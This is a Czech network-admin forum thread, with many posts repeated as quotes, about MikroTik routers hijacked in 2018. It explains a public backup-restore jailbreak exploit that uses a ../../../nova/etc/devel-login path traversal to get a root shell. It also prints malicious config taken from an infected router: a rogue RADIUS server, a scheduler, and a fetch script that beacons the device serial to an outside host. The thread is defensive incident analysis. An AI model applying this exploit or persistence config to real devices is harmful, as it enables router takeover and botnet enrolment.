MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

dxtx

Zdravím, taky se mi zablokoval jeden router s veřejkou a pozdravem ve firewalu. Prohlídl jsem i okolní a ve 2. SXT jsem našel ve files soubor:

backup.jpg

datum je včerejší. Nejsem si vědom, že bych tam něco podnikal. Všude byla 6.42.1. Na WAN portu 8291 klid. mpcz, 1.jun.2018

Nyní jsem našel stejně podezřelý backup file jako zde uvádíš viz screen.

Je vyloučeno, že by byl backup vytvořen z mojí strany...

Na mikrotiku žádná podezřelá aktivita není.

je možné že i přesto je router napadený?

Děkuji

dalibortoman

Zdravím, taky se mi zablokoval jeden router s veřejkou a pozdravem ve firewalu. Prohlídl jsem i okolní a ve 2. SXT jsem našel ve files soubor:

backup.jpg

datum je včerejší. Nejsem si vědom, že bych tam něco podnikal. Všude byla 6.42.1. Na WAN portu 8291 klid. mpcz, 1.jun.2018

Nyní jsem našel stejně podezřelý backup file jako zde uvádíš viz screen.

Je vyloučeno, že by byl backup vytvořen z mojí strany...

Na mikrotiku žádná podezřelá aktivita není.

je možné že i přesto je router napadený?

Děkuji

kristalovou kouli nemam ale

skript z https://github.com/0ki/mikrotik-tools/b ... it_full.sh se pokousi vyrobit backup file na MT presne v tom formatu jako ho vidim v Tvem screenshotu:

"jb_$$_$RANDOM.backup"

Takze je IMHO dost jiste, ze heslo k MT je prozrazene (ten skript ho musi znat). Bud ho uhodli nebo ziskali z napadnutelne verze ROSu

edit: teoreticky by nyni (pokud byl instalovan ten jail break exploit) ted ten mikrotik na telnet mohl umoznit prihlaseni do devel modu (user, heslo od admina) - videl bys shell z linuxu ne Mikrotik CLI

mpcz

Dík, zdá se, že na tom něco bude. Sice tomu dopodrobna nerozumím, možná by to chtělo více rozpitvat, ale čemu už vůbec nerozumím, je to, že Sergej mi napsal, že ten soubor vznikl přirozenou cestou. Moc jsem tomu nevěřil a teď o to míň. Dalo by se to více ozřejmit, pro ty méně chápavé, co ten skript dělá? A třeba i popis celého předpokládaného děje od počátku i když je to zatím pouze teorie? A proč tam vůbec ten backup útočník potřebuje? Cca 3 dni před tím incidentem tam byla verze 6.42.1 a změněno heslo, které nikde jinde nebylo. Že by ho uhodl, tomu moc nevěřím. Dík. mpcz, 8.jun.2018

dxtx

Zdravím, taky se mi zablokoval jeden router s veřejkou a pozdravem ve firewalu. Prohlídl jsem i okolní a ve 2. SXT jsem našel ve files soubor:

backup.jpg

datum je včerejší. Nejsem si vědom, že bych tam něco podnikal. Všude byla 6.42.1. Na WAN portu 8291 klid. mpcz, 1.jun.2018

Nyní jsem našel stejně podezřelý backup file jako zde uvádíš viz screen.

Je vyloučeno, že by byl backup vytvořen z mojí strany...

Na mikrotiku žádná podezřelá aktivita není.

je možné že i přesto je router napadený?

Děkuji

Dodatek: ještě jsem si všiml že firewall byl kompletně smazaný (až na 2 pravidla pro blokování DNS open resolver)..

Bude se řešit výměnou zařízení a následné kompletní smazání a přehrání přes netinstal :(

o tom, že vznikl soubor přirozenou cestou silně pochybuji...

Pro zajímavost: na mikrotiku je firmware: 6.41.2

dalibortoman

Dík, zdá se, že na tom něco bude. Sice tomu dopodrobna nerozumím, možná by to chtělo více rozpitvat, ale čemu už vůbec nerozumím, je to, že Sergej mi napsal, že ten soubor vznikl přirozenou cestou. Moc jsem tomu nevěřil a teď o to míň.

pokud ten file mel jmeno ve stejnem tvaru tak silne pochybuju - ledaze by nejaky autobackup v MT vytvarel podobne jmeno (backup nepouzivame netusim). Pokud zadny autobackup v ROSu neni (nechova se podobne) pak by Sergej mel zavetrit pokud by mu nekdo ukazal ten github repository

Dalo by se to více ozřejmit, pro ty méně chápavé, co ten skript dělá? A třeba i popis celého předpokládaného děje od počátku i když je to zatím pouze teorie? A proč tam vůbec ten backup útočník potřebuje? Cca 3 dni před tím incidentem tam byla verze 6.42.1 a změněno heslo, které nikde jinde nebylo. Že by ho uhodl, tomu moc nevěřím. Dík. mpcz, 8.jun.2018

moc jsem to nestudoval ale vypada to, ze backup resp restore backup mechanismus je pouzivat k tomu exploitovani. Utocnik musi mit pristup na MT (jmeno/heslo) aby byl schopen vyrobit backup file. Ten si stahne, pak na nej posle skript (exploit_b.py), ten backup file zmodifikuje. Soubor se nahraje zpet na MT a pak se udela restore (system backup load...), ktery vyuzije nejakou bezpecnostni diru v mechanismu aplikovani backupu a je to. Pak by mel fungovat devel mode = primy shell v telnetu. zatim jsem nezkousel ale asi to nebude marne - podivat se jak vypada linux od MT zevnitr

K cemu to utocnik potrebuje? Jakmile ziskal shell pristup primo k linuxu, muze si delat co chce. Instalovat libovolne binarky, menit CFG. Cili idealni pro botnet...

na forum.mikrotik.com ani v changelozich jsem nenasel ze by se to resilo tak jsem se pro sichr zeptal:

https://forum.mikrotik.com/viewtopic.php?f=2&t=135423

mpcz

Ano, nedovedu to posoudit do hloubky, ale vypadá to srozumitelně. První, co bych udělal, kdybych to uměl, je výroba zadních vrátek. Velice rád bych se mrkl, co je v MKT, (pokud je samozřejmě něco čitelné), který je uzamklý změnou hesla a proč to vlastně dělá. mpcz, 08.jun.2018

dalibortoman

Ano, nedovedu to posoudit do hloubky, ale vypadá to srozumitelně. První, co bych udělal, kdybych to uměl, je výroba zadních vrátek. Velice rád bych se mrkl, co je v MKT, (pokud je samozřejmě něco čitelné), který je uzamklý změnou hesla a proč to vlastně dělá. mpcz, 08.jun.2018

tak modifikace backupu spociva pry v pridani ../../../nova/etc/devel-login/ takze to docela ukazuje na zadni vratka MT vyvojaru. Je mozne, ze ten backup file musi mit i zvlastni jmeno - pak bych se nedivil, ze ze supportu nekdo napise, ze backup soubor vznikl normalni cestou :-)

kaja

Muzete nekdo decryptovat ten jb_$$_$RANDOM.backup a poslat sem tu sekci tykajici se devel-login?

Zajimalo by mne jak tam dosahli toho vytvoreni ../../../nova/etc/devel-login.

Devel pristup pomoci ../../../nova/etc/devel-login je stara vec. Jen vytvareni tohoto souboru je jiz pomerne striktne hlidano. Ale zapomeli asi ohlidat procesy pri obnove configu z backupu.

mpcz

Jak? Chtěl jsem to po Sergejovi, ale ten to prohlásil za "jeho" dílo a ani se nenamáhal. Písmenka ale ještě rozpoznám, takže si myslím, že na tom "develu" něco je, co stojí za prozkoumání. Jsem přesvědčen, že se kolega Toman ubírá správným směrem. mpcz, 8.jun.2018

dalibortoman

Muzete nekdo decryptovat ten jb_$$_$RANDOM.backup a poslat sem tu sekci tykajici se devel-login?

Zajimalo by mne jak tam dosahli toho vytvoreni ../../../nova/etc/devel-login.

Devel pristup pomoci ../../../nova/etc/devel-login je stara vec. Jen vytvareni tohoto souboru je jiz pomerne striktne hlidano. Ale zapomeli asi ohlidat procesy pri obnove configu z backupu.

K.

https://github.com/0ki/mikrotik-tools/b ... ploit_b.py

honzam

devel mode

Jak jsi na ten mod přišel? Nikdy jsem nic takového nikde nečetl. Pokud něco takového existuje tak by to bylo zajímavé...

mpcz

OK, sorry, nějak z toho jasně nevidím, kdo, kdy a proč ten backup vytvořil. mpcz, 8.jun.2018

mpcz

kristalovou kouli nemam ale

skript z https://github.com/0ki/mikrotik-tools/b ... it_full.sh se pokousi vyrobit backup file na MT presne v tom formatu jako ho vidim v Tvem screenshotu:

"jb_$$_$RANDOM.backup"

Takze je IMHO dost jiste, ze heslo k MT je prozrazene (ten skript ho musi znat). Bud ho uhodli nebo ziskali z napadnutelne verze ROSu

Jsa úplný Linux laik, tak po delším boji s Linuxem potvrzuji vše, co je zde napsáno. Funguje to. Rýpání do Linuxu nechám odborníkům. mpcz, 10.jun.2018

okoun

Dík, zdá se, že na tom něco bude. Sice tomu dopodrobna nerozumím, možná by to chtělo více rozpitvat, ale čemu už vůbec nerozumím, je to, že Sergej mi napsal, že ten soubor vznikl přirozenou cestou. Moc jsem tomu nevěřil a teď o to míň. Dalo by se to více ozřejmit, pro ty méně chápavé, co ten skript dělá? A třeba i popis celého předpokládaného děje od počátku i když je to zatím pouze teorie? A proč tam vůbec ten backup útočník potřebuje? Cca 3 dni před tím incidentem tam byla verze 6.42.1 a změněno heslo, které nikde jinde nebylo. Že by ho uhodl, tomu moc nevěřím. Dík. mpcz, 8.jun.2018

ted se mi na dvou CPE s verzí 6.42.1 také změnil hesl, CPE měly veřejky, tak nevím co je zle?

mpcz

A jaké bylo učiněno doplňové opatření kromě poslední verze a změny hesla? A bylo stejné heslo i někde jinde? To považuji za slabinu systému, protože společné heslo je spíše pravidlem, než vyjímkou. Pokusím se zjistit, jaké je heslo do zamklých strojů, mohlo by být společné nebo z něčeho generovatelné, čemuž ale moc nevěřím. mpcz, 15.jun.2018

myghael

A máme to tu zase... Kromě klasiky (změny DNS) to dělá i jiné skopičiny:

/system identity

set name=test

/ip pool

add name=pool1 ranges=10.1.1.2-10.1.1.250

/ppp profile

add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test remote-address=pool1 use-encryption=yes

/radius

add address=47.75.230.175 secret=test service=ppp

/system scheduler

add interval=30m name=a on-event=ip policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup

/system script

add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source=\

"{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=XXXXXXXXXX&action=upload&sncode=YYYYYYYY&dynamic=static\")}"

Na přístup si to vytváří nového uživatele ("Admin" - opravdu s velkým A) v systému a radius. V tom skriptu je XXXXXXX nějaký kód zatím v každém RB unikátní, totéž YYYYYYYY, jehož součástí je i sériové číslo routerboardu. Na některých byla vytvořená i nějaká maškaráda v NAT. Výše uvedený výpis pochází z napadeného zařízení, které běží na ROS i firmware 6.42.3 a kterému bylo jméno i heslo pro přístup změněno před několika málo dny.

Už se to řeší i na fóru MikroTiku:

https://forum.mikrotik.com/viewtopic.php?t=135762

https://forum.mikrotik.com/viewtopic.php?f=2&t=135774

Setkal se s tím už někdo zdejší?

dalibortoman

jenze stale plati, ze nikdo neni schopen prokazat, ze slo o skutecny hack. Jak pise strods - vsechny nahlasene 'hacky' verzi ROSu s opravenymi bezp. chybami se daji pripsat moznosti, ze byly hacknuty s pouzitim drive ziskaneho hesla...

ludvik

Proč tajíš ty kódy? Třeba by někoho mohlo zajímat, co to stahuje.

dalibortoman

Proč tajíš ty kódy? Třeba by někoho mohlo zajímat, co to stahuje.

nasel jsem jednoho napadeneho MT (zakaznikova wifina), ktery se bavi s tim serverem a pri pokusu o stazeni wgetem je videt, ze server vraci jen text "ok". Kdyz jsem zmenil cisl v parametru key pak odpovedel "no".

Cili to nic nestahuje ale jen informuje centralu

ludvik

Už jsem to také zkusil :-)

Blbé je, že to je nějaký cloud a netroufnu si to prostě po ip seknout ... jen tak pro jistotu.

« Předchozí stránka Další stránka »